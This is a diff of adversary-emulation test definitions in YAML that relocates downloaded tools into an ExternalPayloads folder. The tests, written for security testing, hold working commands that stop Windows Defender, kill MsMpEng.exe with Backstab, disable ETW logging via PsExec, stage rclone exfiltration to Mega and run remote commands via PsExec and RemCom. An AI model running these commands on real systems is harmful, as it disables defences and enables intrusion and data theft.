     get_prereq_command: |
-      Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip"
-      Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip"
+      Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force
   executor:
     command: |
       Try {cmd /c #{AdvancedRun_Location} /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
@@ -633,11 +636,13 @@ atomic_tests:
       default: MsMpEng.exe
   dependency_executor_name: powershell
   dependencies:
-  - description: Backstab64.exe should exist in %temp%
-    prereq_command: if (Test-Path $env:temp\Backstab64.exe) {exit 0} else {exit 1}
-    get_prereq_command: Start-BitsTransfer -Source "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -Destination "$env:temp\Backstab64.exe" -dynamic
+  - description: Backstab64.exe should exist in ExtrnalPayloads Directory
+    prereq_command: if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe"
   executor:
-    command: '& $env:temp\Backstab64.exe -k -n #{process_name}'
+    command: '& PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe -k -n #{process_name}'
     name: powershell
     elevation_required: true
 - name: WinPwn - Kill the event log services for stealth

atomics/T1562.006/T1562.006.yaml

@@ -88,7 +88,7 @@ atomic_tests:
     ps_exec_location:
       description: Location of PSExec.
       type: string
-      default: $env:temp\pstools\PsExec.exe
+      default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe
     session:
       description: The session to disable.
       type: string
@@ -102,8 +102,9 @@ atomic_tests:
   - description: PSExec must be installed on the machine.
     prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1}
     get_prereq_command: |-
-      start-bitstransfer -source "https://download.sysinternals.com/files/PSTools.zip" -destination "$env:temp\PStools.zip"
-      expand-archive -literalpath "$env:temp\PStools.zip" -destinationpath "$env:temp\pstools" -force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
+      expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
   executor:
     command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets
     cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets

atomics/T1564.006/T1564.006.yaml

@@ -90,17 +90,18 @@ atomic_tests:
     prereq_command: |
       if (Test-Path "#{virtualbox_exe}") {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
       $wc = New-Object System.Net.WebClient
-      $wc.DownloadFile("#{virtualbox_download}","$env:TEMP\#{virtualbox_installer}")
-      start-process -FilePath "$env:TEMP\#{virtualbox_installer}" -ArgumentList "--silent" -Wait
+      $wc.DownloadFile("#{virtualbox_download}","PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}")
+      start-process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}" -ArgumentList "--silent" -Wait
   - description: |
       VBoxManage must exist on disk at specified locations (#{vboxmanage_exe})
     prereq_command: |
       if (Test-Path "#{vboxmanage_exe}") {exit 0} else {exit 1}
     get_prereq_command: |
       $wc = New-Object System.Net.WebClient
-      $wc.DownloadFile("#{virtualbox_download}","$env:TEMP\#{virtualbox_installer}")
-      start-process -FilePath "$env:TEMP\#{virtualbox_installer}" -ArgumentList "--silent" -Wait
+      $wc.DownloadFile("#{virtualbox_download}","PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}")
+      start-process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}" -ArgumentList "--silent" -Wait
   executor:
     name: command_prompt
     elevation_required: false

atomics/T1567.002/T1567.002.yaml

@@ -12,7 +12,7 @@ atomic_tests:
     rclone_path:
       description: Directory of rclone.exe
       type: path
-      default: $env:temp\T1567.002\rclone-v*\
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1567.002\rclone-v*\
     rclone_config_path:
       description: Path to rclone's config file (default should be fine)
       type: path
@@ -20,7 +20,7 @@ atomic_tests:
     dir_to_copy:
       description: Directory to copy
       type: string
-      default: $env:temp\T1567.002
+      default: PathToAtomicsFolder\..\ExternalPayloads\T1567.002
     mega_user_account:
       description: Mega user account
       type: string
@@ -40,8 +40,9 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{rclone_path}) {exit 0} else {exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile $env:temp\rclone.zip
-      Expand-archive -path $env:temp\rclone.zip -destinationpath $env:temp\T1567.002\ -force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile PathToAtomicsFolder\..\ExternalPayloads\rclone.zip
+      Expand-archive -path PathToAtomicsFolder\..\ExternalPayloads\rclone.zip -destinationpath PathToAtomicsFolder\..\ExternalPayloads\T1567.002\ -force
   executor:
     command: |
       New-Item #{rclone_config_path}\rclone -ItemType directory
@@ -56,7 +57,7 @@ atomic_tests:
       .\rclone.exe config delete #{remote_share}:
       Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue
       cd c:\
-      Remove-Item $env:temp\rclone.zip
-      Remove-Item $env:temp\T1567.002 -recurse -force
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\rclone.zip
+      Remove-Item PathToAtomicsFolder\..\ExternalPayloads\T1567.002 -recurse -force
     name: powershell
     elevation_required: false

atomics/T1569.002/T1569.002.yaml

@@ -52,24 +52,20 @@ atomic_tests:
       description: Password
       type: string
       default: P@ssw0rd1
-    psexec_exe:
-      description: Path to PsExec
-      type: string
-      default: C:\PSTools\PsExec.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
+      PsExec tool from Sysinternals must exist in the ExternalPayloads directory
     prereq_command: |
-      if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
+      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe") { exit 0} else { exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
-      Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
-      New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
-      Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
+      Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip PathToAtomicsFolder\..\ExternalPayloads\PsTools -Force
+      Copy-Item PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -Force
   executor:
     command: |
-      #{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe"
+      PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe"
     name: command_prompt
 - name: psexec.py (Impacket)
   auto_generated_guid: edbcd8c9-3639-4844-afad-455c91e95a35
@@ -160,21 +156,18 @@ atomic_tests:
       description: Password
       type: string
       default: P@ssw0rd1
-    remcom_exe:
-      description: Path to RemCom
-      type: string
-      default: $pathtoatomicsfolder\T1569.002\bin\remcom.exe
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      RemCom tool must exist on disk at specified location (#{remcom_exe})
+      RemCom tool must exist on disk in the ExternalPayloads folder
     prereq_command: |
-      if (Test-Path "#{remcom_exe}") { exit 0} else { exit 1}
+      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\remcom.exe") { exit 0} else { exit 1}
     get_prereq_command: |
-      Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "#{remcom_exe}"
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest "https://github.com/kavika13/RemCom/raw/master/bin/Release/RemCom.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\remcom.exe"
   executor:
     command: |
-      "#{remcom_exe}" \\#{remote_host} /user:#{user_name} /pwd:#{password} cmd.exe
+      "PathToAtomicsFolder\..\ExternalPayloads\remcom.exe" \\#{remote_host} /user:#{user_name} /pwd:#{password} cmd.exe
     name: command_prompt
 - name: Snake Malware Service Create
   auto_generated_guid: b8db787e-dbea-493c-96cb-9272296ddc49